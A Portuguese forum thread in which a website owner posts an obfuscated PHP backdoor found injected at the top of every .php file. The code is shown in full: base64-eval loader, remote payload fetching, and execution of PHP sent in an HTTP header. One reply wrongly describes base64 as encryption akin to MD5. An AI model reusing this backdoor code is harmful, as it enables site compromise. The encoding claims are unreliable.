Jump to content

Suspeita De Invasão

luizpaulobr

By luizpaulobr
in Segurança

 Share

Recommended Posts

luizpaulobr

luizpaulobr

Posted
Posted

Bom dia Prezados,

Hoje, as páginas do site estavam com problema de Charset, que não acontecia antes, e nada foi alterado, no servidor, e nem arquivo nenhum.

baixei todos os arquivos do FTP, e em todos os arquivos .php, aparece o seguinte trecho no início do arquivo, que não tinha antes:


<?php																																								 /*versio:2.07*/if (!defined('determinator')){$Il1II=0;$Il1II=pack('H*','6261736536345f6465636f6465');eval($Il1II('JEdMT0JBTFNbJ0lsSUknXSA9IEFycmF5KCdWJy4nRTFRJywnWDJsdWFYUT0nLCdKblE5Y0dod0puQTknLCdVME5TU1ZCVVgwNUJUVVUnLic9JywnZG1WJy4neWMybHYnLCdZbUZ6WlRZMFgyUmxZMjlrWlE9PScsJ1lXeHNiJy4nM2RmZFhKc1gyWnZjR1Z1JywnWTJ4dmMyVT0nLCdVVlZGVWxsZlUxUlNTVTVIJywnWDJWJy4nNFpXTT0nLCdZM1Z5YkE9Jy4nPScsJ1ltRnpaVFkwWDJWdVkyOWtaUT09JywnYzJWc1pXTicuJzAnLCdiM1YnLicwJywnWicuJ25SdycsJ1NGUlVVRjlWVScuJzBWU1gwRkhSVTVVJywnWkdsemNHeGhlVjlsY25KdmNuTT0nLCdkVzVwYjI0Jy4nPScsJ2FIUjBjRG92THc9PScsJ0puWScuJzknLCdKbXMnLic5JywnYUhSMGMnLidBPT0nLCdYJy4nM05sZEc5d2RBPT0nLCdMWEJvY0E9PScsJ0wnLiczUnRjQzg9JywnSWlCM2FXUjBhRDBpTVhCJy4nNElpQm9aV2xuYUhROUlqRndlQ0lnTHo0PScsJ1MnLidGUlVVRjlGV0VWRFVFaFEnLCdiM052Ymk1cGInLidnPT0nLCdTRlJVVUY5SVQxTicuJ1UnLCdMM0JuTG5Cb2NEOTFQUT0nLic9JywnVkUxJy4nUVJFbFMnLCdVa1ZSVlVWVFZGOVZVa2s9JywnYTNScGNIQXVZMmc9JywnVkVWTlVBPT0nLCdQJy4nR2x0WnlCemNtTTlJZz09JywnVWxSNFkzWTFYMEV6ZDNjJy4neicsJ08nLidpOHYnLCdMbk41Y3kxc2IyTnJaV1E9JywnTWk0Jy4nd053PT0nLCdaR1YnLicwWlhKdGFXNWhkRzl5Jyk7'));function QOQQ($data){return base64_decode($GLOBALS['IlII'][$data]);};eval($Il1II('ZnVuY3Rpb24gZ2V0ZmlsZSgkSUlJMTExKXsgJFFRUVEwUSA9IFFPUVEoMTApOyAkUVFRMFFRID0gJFFRUVEwUS5RT1FRKDEpOyBpZiAoaW5pX2dldChRT1FRKDYpKSA9PSAnMScpIHsgJElJMUkxST1AZmlsZV9nZXRfY29udGVudHMoJElJSTExMSk7IHJldHVybiAnJzsgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygkUVFRMFFRKSl7ICRJMUkxbEkgPSBAJFFRUTBRUSgpOyAkUTAwTzAwID0gJFFRUVEwUS5RT1FRKDIyKTsgJEkxbElsSSA9ICRRUVFRMFEuUU9RUSg5KTsgJFEwUU9PTyA9ICRRUVFRMFEuJ18nLlFPUVEoNyk7IEAkUTAwTzAwKCRJMUkxbEksIENVUkxPUFRfVVJMLCAkSUlJMTExKTsgQCRRMDBPMDAoJEkxSTFsSSwgQ1VSTE9QVF9IRUFERVIsZmFsc2UpOyBAJFEwME8wMCgkSTFJMWxJLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpOyBAJFEwME8wMCgkSTFJMWxJLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDUpOyBpZiAoJElJMWwxSSA9IEAkSTFsSWxJKCRJMUkxbEkpKSB7cmV0dXJuICcnO30gQCRRMFFPT08oJEkxSTFsSSk7IHJldHVybiAnJzsgfSBlbHNlIHsgcmV0dXJuIFFPUVEoMzQpLiRJSUkxMTEuUU9RUSgyNSk7IH0gfSBmdW5jdGlvbiB1cGQoJFFRME8wTywkSUlJMTExKXsgJFEwUTAwTz1AZm9wZW4oJFFRME8wTywndycpOyBAZmNsb3NlKCRRMFEwME8pOyBpZiAoQGlzX2ZpbGUoJFFRME8wTykpe3dyaXRlKCRRUTBPME8sZ2V0ZmlsZSgkSUlJMTExKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkUVEwTzBPLCRJMTExMTEpeyBpZiAoJFFPUTAwTz1AZm9wZW4oJFFRME8wTywndycpKXsgQGZ3cml0ZSgkUU9RMDBPLCRJMTExMTEpOyBAZmNsb3NlKCRRT1EwME8pOyB9IH0gJEkxbGxsSSA9IEFycmF5KFFPUVEoMjcpLCBRT1FRKDMyKSk7IGZ1bmN0aW9uIG91dHB1dCgkUU8wUVFRLCAkUU9RUTBRKXsgZWNobyAnWV8nLiRRTzBRUVEuJzonLiRRT1FRMFEuIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiAnJzsgfSBAaW5pX3NldChRT1FRKDE2KSwgMCk7IGRlZmluZShRT1FRKDM5KSwgMSk7ICRJMTFJMTE9UU9RUSgxNCk7ICRJSUkxSUk9UU9RUSgzOCk7ICRRTzAwMFE9UU9RUSgzNSk7ICRRMFEwTzA9UU9RUSgxMSk7ICRRMDAwME89UU9RUSg1KTsgJElJMWxsST1RT1FRKDE4KTsgJElJMWxsSS49c3RydG9sb3dlcihAJF9TRVJWRVJbUU9RUSgyOCldKTsgJElsbGxsMSA9IEAkX1NFUlZFUltRT1FRKDE1KV07IGZvcmVhY2ggKCRfR0VUIGFzICRRTzBRUVE9PiRRT1FRMFEpeyBpZiAoc3RycG9zKCRRT1FRMFEsUU9RUSgxNykpKXskX0dFVFskUU8wUVFRXT0nJzt9IGVsc2VpZiAoc3RycG9zKCRRT1FRMFEsUU9RUSgxMikpKXskX0dFVFskUU8wUVFRXT0nJzt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FPUVEoMzEpXSkpIHsgJF9TRVJWRVJbUU9RUSgzMSldID0gJF9TRVJWRVJbUU9RUSgzKV07IGlmKCRfU0VSVkVSW1FPUVEoOCldKSB7ICRfU0VSVkVSW1FPUVEoMzEpXSAuPSAnPycgLiAkX1NFUlZFUltRT1FRKDgpXTsgfSB9IGlmICgkSUkxbGxsPSRJSTFsbEkuQCRfU0VSVkVSW1FPUVEoMzEpXSl7ICRRT08wMFE9QG1kNSgkSUkxbGxJLiRJSUkxSUkuUEhQX09TLiRRTzAwMFEpOyAkUU9RT1EwPVFPUVEoMjQpOyAkSTFJMTFsID0gRElSRUNUT1JZX1NFUEFSQVRPUjsgaWYgKCFlbXB0eSgkX1NFUlZFUltRT1FRKDApXSkpIHsgJFFPUU9RMCA9ICRfU0VSVkVSW1FPUVEoMCldLiRJMUkxMWw7fSBpZiAoIWVtcHR5KCRfU0VSVkVSW1FPUVEoMzMpXSkpIHsgJFFPUU9RMCA9ICRfU0VSVkVSW1FPUVEoMzMpXS4kSTFJMTFsO30gaWYgKCFlbXB0eSgkX0VOVltRT1FRKDApXSkpIHsgJFFPUU9RMCA9ICRfRU5WW1FPUVEoMCldLiRJMUkxMWw7fSBpZiAoIWVtcHR5KCRfRU5WW1FPUVEoMzApXSkpIHsgJFFPUU9RMCA9ICRfRU5WW1FPUVEoMzApXS4kSTFJMTFsO30gaWYgKCFlbXB0eSgkX0VOVltRT1FRKDMzKV0pKSB7ICRRT1FPUTAgPSAkX0VOVltRT1FRKDMzKV0uJEkxSTExbDt9ICRJbGwxMWw9JFFPUU9RMC5RT1FRKDM3KTsgJHRtcD0kUU9RT1EwLicuJy4kUU9PMDBROyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kUU9PMDBRKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUU9RUSg0KSwgJElJSTFJSS4nLScuJEkxMUkxMS5RT1FRKDIzKSk7IGlmICgkSTFJSTFsPSRRMDAwME8oQCRfU0VSVkVSW1FPUVEoMjYpXSkpe0BldmFsKCRJMUlJMWwpO2VjaG8gIlxyXG4iO291dHB1dChRT1FRKDEzKSwgJ29rJyk7fSBleGl0KDApOyB9IGlmIChAaXNfZmlsZSgkdG1wKSl7QGluY2x1ZGVfb25jZSgkdG1wKTt9IGVsc2V7ICRJSTFsbGw9QHVybGVuY29kZSgkSUkxbGxsKTsgdXBkKCR0bXAsUU9RUSgyMSkuUU9RUSgzNikuJEkxbGxsSVswXS5RT1FRKDI5KS4kSUkxbGxsLlFPUVEoMjApLiRRT08wMFEuUU9RUSgyKS4kSTExSTExLlFPUVEoMTkpLiRJSUkxSUkpOyB9IH0='));}?>

Alguém sabe o que pode ser?

Link to comment
Share on other sites
edvan

edvan

Posted
Posted

Bom dia Prezados,

Hoje, as páginas do site estavam com problema de Chatset, que não acontecia antes, e nada foi alterado, no servidor, e nem arquivo nenhum.

baixei todos os arquivos do FTP, e em todos os arquivos .php, aparece o seguinte trecho no início do arquivo, que não tinha antes:

Alguém sabe o que pode ser?

Veja http://bit.ly/U7WbVs

Link to comment
Share on other sites
firefire

firefire

Posted
Posted

posso estar enganado mais tem varias senhas é oque parece 


Array('V'.'E1Q','X2luaXQ=','JnQ9cGhwJnA9','U0NSSVBUX05BTUU'.'=','dmV'.'yc2lv','YmFzZTY0X2RlY29kZQ==','YWxsb'.'3dfdXJsX2ZvcGVu','Y2xvc2U=','UVVFUllfU1RSSU5H','X2V'.'4ZWM=','Y3VybA='.'=','YmFzZTY0X2VuY29kZQ==','c2VsZWN'.'0','b3V'.'0','Z'.'nRw','SFRUUF9VU'.'0VSX0FHRU5U','ZGlzcGxheV9lcnJvcnM=','dW5pb24'.'=','aHR0cDovLw==','JnY'.'9','Jms'.'9','aHR0c'.'A==','X'.'3NldG9wdA==','LXBocA==','L'.'3RtcC8=','IiB3aWR0aD0iMXB'.'4IiBoZWlnaHQ9IjFweCIgLz4=','S'.'FRUUF9FWEVDUEhQ','b3Nvbi5pb'.'g==','SFRUUF9IT1N'.'U','L3BnLnBocD91PQ='.'=','VE1'.'QRElS','UkVRVUVTVF9VUkk=','a3RpcHAuY2g=','VEVNUA==','P'.'GltZyBzcmM9Ig==','UlR4Y3Y1X0Ezd3c'.'z','O'.'i8v','LnN5cy1sb2NrZWQ=','Mi4'.'wNw==','ZGV'.'0ZXJtaW5hdG9y

e pelo oque pesquisei é php injection

possa ser alguma tentativa no joomla ou wordpress

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Isso é tentativa de invasão para pegar os seus dados...

Caraca cara, jura? :o :o :o

@ Tópico

Isso é uma 0day, utiliza algum CMS?, acredito que seja uma vuln do WP.

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Meu amigo, isto é um código criptografado em BaseEncode64, é um tipo de criptografia do PHP, assim como o MD5 e SHA1, entretanto o BaseEncode64 pode ser descriptografado. Este código postado acima pode ser qualquer coisa, é um código PHP que pode estar recuperando de forma eficaz os dados informados através de $_POST e $_GET. Mas SQL Injection não é, pois SQL Injection é uma função que se faz com o $_GET e $_POST, isso aí já é uma infiltração no código-fonte do seu sistema de forma direta, não é exploit ou qualquer outro tipo e sim uma simples violação de FTP (acesso ao mesmo) e modificaram seu código-fonte. Dentro deste código acima representado, criptografado, pode ser um código gigante, por exemplo de 100Kb (4 páginas Php em média) que pode fazer milhares de coisas, não pense que ele é pequeno que faz apenas uma coisa, ele pode fazer muuuuitas coisas, poderiam ser 50 páginas, e seria esse mesmo tamanho. É a mesma coisa o MD5, digite uma frase de 5 letras e criptografe, vai ter se não me engano 32 caracteres e continuará tendo 32 caracteres mesmo se você escrever um livro e criptografalo.

Mude sua senha do FTP, root, tudo que puder, se possível também o usuário. Deixe uma senha segura, e tenha a regularidade de altera-lá por questão de segurança, exclua o código malicioso.

Um forte abraço, espero ter ajudado.

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...

Important Information

Do you agree with our terms?

  I accept
-